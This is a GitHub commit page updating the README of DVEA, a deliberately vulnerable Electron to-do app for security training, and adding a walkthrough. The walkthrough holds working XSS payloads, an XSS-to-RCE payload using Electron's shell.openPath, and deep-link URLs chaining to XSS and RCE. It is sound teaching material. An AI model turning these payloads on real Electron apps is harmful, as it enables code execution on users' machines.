-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #5 from njmulsqb/walkthrough
Walkthrough
- Loading branch information
Showing
2 changed files
with
58 additions
and
12 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,44 +1,59 @@ | ||
| # DVEA | ||
|
|
||
| ### NOTE: This App Is Vulnerable, DO NOT RUN IN PRODUCTION ENVIRONMENT | ||
|
|
||
| Damn Vulnerable ElectronJS App (DVEA) is a purposely built vulnerable ElectronJS app for developers and security engineer. | ||
|
|
||
| It contains major vulnerabilities that are specific to ElectronJS environment. | ||
|
|
||
| The app demonstrates a vulnerable to do list, following vulnerabilties are currently added to the app: | ||
|
|
||
| 1. Cross Site Scripting | ||
| 2. XSS to RCE | ||
| 3. Deep Links to XSS | ||
| 4. Deep Links to RCE | ||
|
|
||
| - - - | ||
|
|
||
| ## WARNING! | ||
|
|
||
| Damn Vulnerable Electron Application is damn vulnerable! **Do not upload it to your hosting provider's public html folder or any Internet facing servers**, as they will be compromised. It is recommended using a virtual machine (such as [VirtualBox](https://www.virtualbox.org/) or [VMware](https://www.vmware.com/)), which is set to NAT networking mode. | ||
|
|
||
| ### Disclaimer | ||
|
|
||
| I does not take responsibility for the way in which any one uses this application (DVEA). I have made the purposes of the application clear and it should not be used maliciously. I have given warnings and taken measures to prevent users from installing DVEA on to live servers. If your server is compromised via an installation of DVEA, it is not my responsibility, it is the responsibility of the person/s who uploaded and installed it. | ||
| --- | ||
|
|
||
| - - - | ||
| ### Download | ||
|
|
||
| Get your copy of DVEA from the github releases section here: https://github.com/njmulsqb/DVEA/releases/latest | ||
| The binaries are available for Linux, MacOS and Windows. | ||
| - - - | ||
|
|
||
| --- | ||
|
|
||
| ### Running from source | ||
|
|
||
| ``` | ||
| git clone https://github.com/njmulsqb/DVEA | ||
| cd DVEA | ||
| npm i | ||
| electron . | ||
| ``` | ||
|
|
||
| --- | ||
|
|
||
| ### Walkthrough | ||
|
|
||
| The walkthrough of this app can be seen at [walkthrough.md](./walkthrough.md) | ||
|
|
||
| --- | ||
|
|
||
| ## WARNING! | ||
|
|
||
| Damn Vulnerable Electron Application is damn vulnerable! **Do not upload it to your hosting provider's public html folder or any Internet facing servers**, as they will be compromised. It is recommended using a virtual machine (such as [VirtualBox](https://www.virtualbox.org/) or [VMware](https://www.vmware.com/)), which is set to NAT networking mode. | ||
|
|
||
| ### Disclaimer | ||
|
|
||
| I do not take responsibility for the way in which any one uses this application (DVEA). I have made the purposes of the application clear and it should not be used maliciously. I have given warnings and taken measures to prevent users from installing DVEA on to live servers. If your server is compromised via an installation of DVEA, it is not my responsibility, it is the responsibility of the person/s who uploaded and installed it. | ||
|
|
||
| ### Contributing | ||
|
|
||
| DVEA is always open for PRs! | ||
|
|
||
| --- | ||
|
|
||
| ### Credits | ||
|
|
||
| The app is built on https://github.com/CodeDraken/electron-todo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,31 @@ | ||
| Here's the brief walkthrough of security vulnerabilities in DVEA: | ||
|
|
||
| # Cross-site Scripting | ||
|
|
||
| A simple XSS payload of `<img src=1 onerror='alert("DVEA")'/>` will do perform XSS on the application when put in the to-do item section | ||
|
|
||
| # XSS to RCE | ||
|
|
||
| To perform RCE via XSS, you need to import "shell" library and execute its `openPath` function using which you can execute commands on the system | ||
|
|
||
| ``` | ||
| <a onmouseover=" | ||
| try{ | ||
| const {shell}=require('electron'); | ||
| shell.openPath('/System/Applications/Calculator.app/') | ||
| }catch(e){ | ||
| console.error(e) | ||
| }">Hover Me</a> | ||
| ``` | ||
|
|
||
| # Deep-link to XSS | ||
|
|
||
| The app is registered with a deep-link of `dvea://` which is used to add tasks to the app using deep link e.g. `dvea://task?add=Clean Your Room` which obviously can be fed with an XSS payload like `dvea://task?add=<img src=1 onerror="alert('Deep link XSS')"/>` when opened via browser. | ||
|
|
||
| # Deep-link to RCE | ||
|
|
||
| Now combining all the above attack vectors we can chain the deep link to achieve RCE using the same payload as in "XSS to RCE" when invoked via the deep link, the payload will look something like | ||
|
|
||
| ``` | ||
| dvea://task?add=<a onmouseover="try{const%20 {shell}=require('electron');shell.openPath('/System/Applications/Calculator.app/')}catch(e){console.error(e)}">Hover Me</a> | ||
| ``` |